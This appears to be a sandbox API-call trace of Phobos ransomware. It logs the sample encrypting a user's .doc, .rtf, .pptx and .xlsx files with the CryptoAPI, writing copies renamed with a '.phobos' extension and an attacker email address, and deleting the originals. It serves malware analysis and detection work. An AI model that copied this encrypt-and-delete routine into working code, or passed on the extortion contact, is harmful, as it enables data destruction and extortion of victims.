CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0196.367] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.367] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0196.367] CryptDestroyKey (hKey=0xa32968) returned 1 [0196.367] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0196.367] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.367] CloseHandle (hObject=0xb0) returned 1 [0196.367] CloseHandle (hObject=0x15c) returned 1 [0196.368] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\fZxai2mLP\\ywUAB7tw1kCil NHujS7.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\fzxai2mlp\\ywuab7tw1kcil nhujs7.pps")) returned 1 [0196.368] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\iS_jkuVwRL9K_cbE87FG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\is_jkuvwrl9k_cbe87fg.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.369] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=44363) returned 1 [0196.369] CloseHandle (hObject=0x15c) returned 1 [0196.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\iS_jkuVwRL9K_cbE87FG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\is_jkuvwrl9k_cbe87fg.pptx")) returned 0x20 [0196.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\iS_jkuVwRL9K_cbE87FG.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\is_jkuvwrl9k_cbe87fg.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\iS_jkuVwRL9K_cbE87FG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\is_jkuvwrl9k_cbe87fg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\iS_jkuVwRL9K_cbE87FG.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\is_jkuvwrl9k_cbe87fg.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.370] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.370] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.370] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xad4b, lpOverlapped=0x0) returned 1 [0196.371] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xad50, dwBufLen=0xad50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xad50) returned 1 [0196.372] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xad50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xad50, lpOverlapped=0x0) returned 1 [0196.374] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0196.374] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.374] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0196.374] CryptDestroyKey (hKey=0xa32d68) returned 1 [0196.374] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0196.374] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.374] CloseHandle (hObject=0x15c) returned 1 [0196.374] CloseHandle (hObject=0xb0) returned 1 [0196.374] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\iS_jkuVwRL9K_cbE87FG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\is_jkuvwrl9k_cbe87fg.pptx")) returned 1 [0196.375] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\qoVReCrCc_DdexZ1uF.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\qovrecrcc_ddexz1uf.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.376] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=31143) returned 1 [0196.376] CloseHandle (hObject=0xb0) returned 1 [0196.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\qoVReCrCc_DdexZ1uF.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\qovrecrcc_ddexz1uf.rtf")) returned 0x20 [0196.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\qoVReCrCc_DdexZ1uF.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\qovrecrcc_ddexz1uf.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\qoVReCrCc_DdexZ1uF.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\qovrecrcc_ddexz1uf.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\qoVReCrCc_DdexZ1uF.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\qovrecrcc_ddexz1uf.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0196.377] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.377] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.377] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x79a7, lpOverlapped=0x0) returned 1 [0196.396] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x79b0, dwBufLen=0x79b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x79b0) returned 1 [0196.396] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x79b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x79b0, lpOverlapped=0x0) returned 1 [0196.397] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0196.397] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.397] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.397] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.397] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.397] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.397] CloseHandle (hObject=0xb0) returned 1 [0196.397] CloseHandle (hObject=0x15c) returned 1 [0196.397] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\qoVReCrCc_DdexZ1uF.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\qovrecrcc_ddexz1uf.rtf")) returned 1 [0196.399] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\u91GP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\u91gp.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.656] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=55972) returned 1 [0196.656] CloseHandle (hObject=0xb0) returned 1 [0196.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\u91GP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\u91gp.doc")) returned 0x20 [0196.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\u91GP.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\u91gp.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\u91GP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\u91gp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.657] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.657] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\u91GP.doc.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\u91gp.doc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.657] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.657] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.657] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdaa4, lpOverlapped=0x0) returned 1 [0196.659] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xdab0, dwBufLen=0xdab0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xdab0) returned 1 [0196.659] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xdab0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xdab0, lpOverlapped=0x0) returned 1 [0196.661] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0196.661] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.661] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.661] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.661] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.661] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.661] CloseHandle (hObject=0xb0) returned 1 [0196.661] CloseHandle (hObject=0x124) returned 1 [0196.661] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\4i9F_Il1\\u91GP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\4i9f_il1\\u91gp.doc")) returned 1 [0196.662] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\WSMf-LY8_MIH2e52JL_.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\wsmf-ly8_mih2e52jl_.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.664] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32197) returned 1 [0196.664] CloseHandle (hObject=0x124) returned 1 [0196.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\WSMf-LY8_MIH2e52JL_.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\wsmf-ly8_mih2e52jl_.rtf")) returned 0x20 [0196.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\WSMf-LY8_MIH2e52JL_.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\wsmf-ly8_mih2e52jl_.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\WSMf-LY8_MIH2e52JL_.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\wsmf-ly8_mih2e52jl_.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.664] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.664] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\WSMf-LY8_MIH2e52JL_.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\wsmf-ly8_mih2e52jl_.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.665] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.665] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.665] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7dc5, lpOverlapped=0x0) returned 1 [0196.666] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7dd0, dwBufLen=0x7dd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7dd0) returned 1 [0196.667] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7dd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7dd0, lpOverlapped=0x0) returned 1 [0196.668] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0196.668] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.668] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.668] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.668] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.668] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.668] CloseHandle (hObject=0x124) returned 1 [0196.668] CloseHandle (hObject=0xb0) returned 1 [0196.668] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\WSMf-LY8_MIH2e52JL_.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\wsmf-ly8_mih2e52jl_.rtf")) returned 1 [0196.669] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AePBE.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aepbe.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.670] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=23393) returned 1 [0196.670] CloseHandle (hObject=0xb0) returned 1 [0196.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AePBE.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aepbe.xlsx")) returned 0x20 [0196.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AePBE.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aepbe.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AePBE.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aepbe.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.670] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.670] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.670] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AePBE.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aepbe.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.671] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.671] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.671] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5b61, lpOverlapped=0x0) returned 1 [0196.673] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b70, dwBufLen=0x5b70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b70) returned 1 